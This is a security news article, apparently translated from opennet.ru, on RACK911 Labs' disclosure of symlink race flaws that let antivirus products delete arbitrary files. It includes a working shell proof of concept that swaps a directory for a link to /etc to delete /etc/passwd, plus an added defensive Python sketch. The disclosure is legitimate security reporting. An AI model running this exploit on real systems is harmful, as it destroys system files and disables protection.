Most antivirus products were open to attack through symbolic links

Researchers from RACK911 Labs have drawn attention to the fact that almost all antivirus packages for Windows, Linux and macOS were vulnerable to attacks that manipulate race conditions during the deletion of files in which malware has been detected.

To carry out the attack, you need to upload a file that the antivirus recognizes as malicious (for example, you can use a test signature), and then, after the antivirus has detected the malicious file but before it calls the function that deletes it, replace the directory containing the file with a symbolic link. On Windows, the same effect is achieved by replacing the directory with a directory junction. The problem is that the antiviruses did not properly check symbolic links and, believing that they were deleting a malicious file, deleted the file in the directory to which the symbolic link pointed.

On Linux and macOS, it is shown how an unprivileged user can delete /etc/passwd or other files in this way, and on Windows the antivirus's own DLL library, in order to block its operation (on Windows the attack is limited to deleting files that are not in use by other applications). For example, an attacker can create an "exploit" directory and place in it a file named EpSecApiLib.dll containing a test virus signature, and then, before the deletion, replace the "exploit" directory with a link to "C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform", which leads to the EpSecApiLib.dll library being removed from the antivirus directory. On Linux and macOS, a similar trick can be done by replacing the directory with a link to "/etc".

#!/bin/sh
rm -rf /home/user/exploit ; mkdir /home/user/exploit/
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
while inotifywait -m "/home/user/exploit/passwd" | grep -m 5 "OPEN"
do
    rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit
done
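
A defensive counterpart to the race described above, as an added example that is not part of the original article or of any vendor's code: the scanner pins the parent directory with a file descriptor at scan time and deletes relative to it (openat/unlinkat semantics), so a later swap of the directory for a symbolic link cannot redirect the deletion. The names PinnedFile and simulate, and the temporary sandbox in which "etc" stands in for /etc, are constructed for illustration; POSIX only.

```python
import os, shutil, stat, tempfile

class PinnedFile:
    """Handle taken at scan time: parent directory fd plus the file's identity."""
    def __init__(self, path):
        parent, self.name = os.path.split(path)
        # Pin the directory itself; later changes to the path cannot redirect this fd.
        self.dir_fd = os.open(parent, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
        st = os.stat(self.name, dir_fd=self.dir_fd, follow_symlinks=False)
        self.ident = (st.st_dev, st.st_ino)

    def delete(self):
        """Unlink relative to the pinned directory; True only if the scanned file was removed."""
        try:
            st = os.stat(self.name, dir_fd=self.dir_fd, follow_symlinks=False)
            if not stat.S_ISREG(st.st_mode) or (st.st_dev, st.st_ino) != self.ident:
                return False      # the name no longer refers to the file that was scanned
            os.unlink(self.name, dir_fd=self.dir_fd)
            return True
        except FileNotFoundError:
            return False          # the directory was emptied or removed under us
        finally:
            os.close(self.dir_fd)

def simulate(delete_by_path):
    """Constructed sandbox: returns True if the protected file survived the swap."""
    base = os.path.realpath(tempfile.mkdtemp())
    try:
        drop, etc = os.path.join(base, "exploit"), os.path.join(base, "etc")
        os.mkdir(drop)
        os.mkdir(etc)
        target = os.path.join(drop, "passwd")
        for p in (target, os.path.join(etc, "passwd")):
            with open(p, "w") as f:
                f.write("constructed sample\n")
        pinned = None if delete_by_path else PinnedFile(target)  # scan flags the file
        shutil.rmtree(drop)       # directory is swapped for a link before deletion
        os.symlink(etc, drop)
        if delete_by_path:
            os.unlink(target)     # vulnerable: the path is resolved again, through the link
        else:
            pinned.delete()
        return os.path.exists(os.path.join(etc, "passwd"))
    finally:
        shutil.rmtree(base)
```
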



In addition, many antiviruses for Linux and macOS were found to use predictable file names when working with temporary files in the /tmp and /private/tmp directories, which could be used to escalate privileges to the root user.

By now, most vendors have fixed the problems, but it is worth noting that the first notifications about the issue were sent to the manufacturers in the fall of 2018. Although not all vendors have released updates, they were given about 6 months to patch, and RACK911 Labs believes it is now free to disclose the vulnerabilities. It is noted that RACK911 Labs has been working on identifying vulnerabilities for a long time, but it did not expect that working with colleagues from the antivirus industry would be so difficult, because of delays in releasing updates and disregard for the need to fix security problems promptly.

Affected products (the free antivirus package ClamAV is not listed):

  • Linux
    • BitDefender GravityZone
    • Comodo Endpoint Security
    • Eset File Server Security
    • F-Secure Linux Security
    • Kaspersky Endpoint Security
    • McAfee Endpoint Security
    • Sophos Anti-Virus for Linux
  • Windows
    • Avast Free Anti-Virus
    • Avira Free Anti-Virus
    • BitDefender GravityZone
    • Comodo Endpoint Security
    • F-Secure Computer Protection
    • FireEye Endpoint Security
    • Intercept X (Sophos)
    • Kaspersky Endpoint Security
    • Malwarebytes for Windows
    • McAfee Endpoint Security
    • Panda Dome
    • Webroot Secure Anywhere
  • macOS
    • AVG
    • BitDefender Total Security
    • Eset Cyber Security
    • Kaspersky Internet Security
    • McAfee Total Protection
    • Microsoft Defender (BETA)
    • Norton Security
    • Sophos Home
    • Webroot Secure Anywhere

    Source: opennet.ru
